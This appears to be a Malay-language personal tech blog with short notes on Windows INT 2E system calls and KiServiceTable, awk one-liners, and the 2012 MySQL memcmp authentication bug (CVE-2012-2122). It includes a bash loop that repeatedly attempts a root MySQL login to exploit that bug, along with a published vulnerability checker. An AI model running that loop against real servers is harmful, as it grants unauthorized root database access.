(KeServiceDescriptorTable.ServiceDescriptor[1], KeServiceDescriptorTable.ServiceDescriptor[2], KeServiceDescriptorTable.ServiceDescriptor[3], semua ni tak pakai)





ref:http://www.thehackademy.net/madchat/vxdevl/library/Defeating%20Kernel%20Native%20API%20Hookers%20by%20Direct%20KiServiceTable%20Restoration.pdf

System Call


Ada 2.
1) INT 2E > Lama (Win 2000 dan sebelum)

ntdll!NtWriteFile:
77f8c552   mov  eax, 0xed
77f8c557   lea  edx, [esp+0x4]
77f8c55b   int  2e
77f8c55d   ret 0x24

eax: index dalam array  KiServiceTable
edx: pointer kpd parameter pertama utk function kernel-mode

interupt akan buat os baca IDT(interupt descriptor table). int 2e akan point kepada  code KiSystemService dalam NTOSKRNL(kernel-mode).
KiSystemService akan baca KiServiceTable base dari nilai eax.

Dalam contoh ni, sebab eax ialah 0xed, function NtWriteFile akan dipanggil.












11 June 2012

awk

Payah betul nak ingat awk ni.

awk -F" " '$7 ~ /\=http/ {print $1, $2, $7}'

Satu lagi:
awk '{if ($8 >= 2*$9) {print $0;}}' input.cif > output.cif

Komputer pun boleh cair

Kalau pujuk banyak kali, komputer pun boleh cair

while true; do mysql -u root mysql --password=baha; done

memcmp issue


/*
 * CVE-2012-2122 checker
 *
 * You may get differing results with/without -m32
 *
 * Joshua J. Drake
 */

#include
#include

int main(void) {
        int one, two, ret;
        time_t start = time(0);
        time_t now;

        srand(getpid()*start);
        while (1) {
                one = rand();
                two = rand();
                ret = memcmp(&one, &two, sizeof(int));
                if (ret < -128 || ret > 127)
                        break;
                time(&now);
                if (now - start > 10) {
                        printf("Not triggered in 10 seconds, *probably* not vulnerable..\n");
                        return 1;
                }
        }
        printf("Vulnerable! memcmp returned: %d\n", ret);
        return 0;
}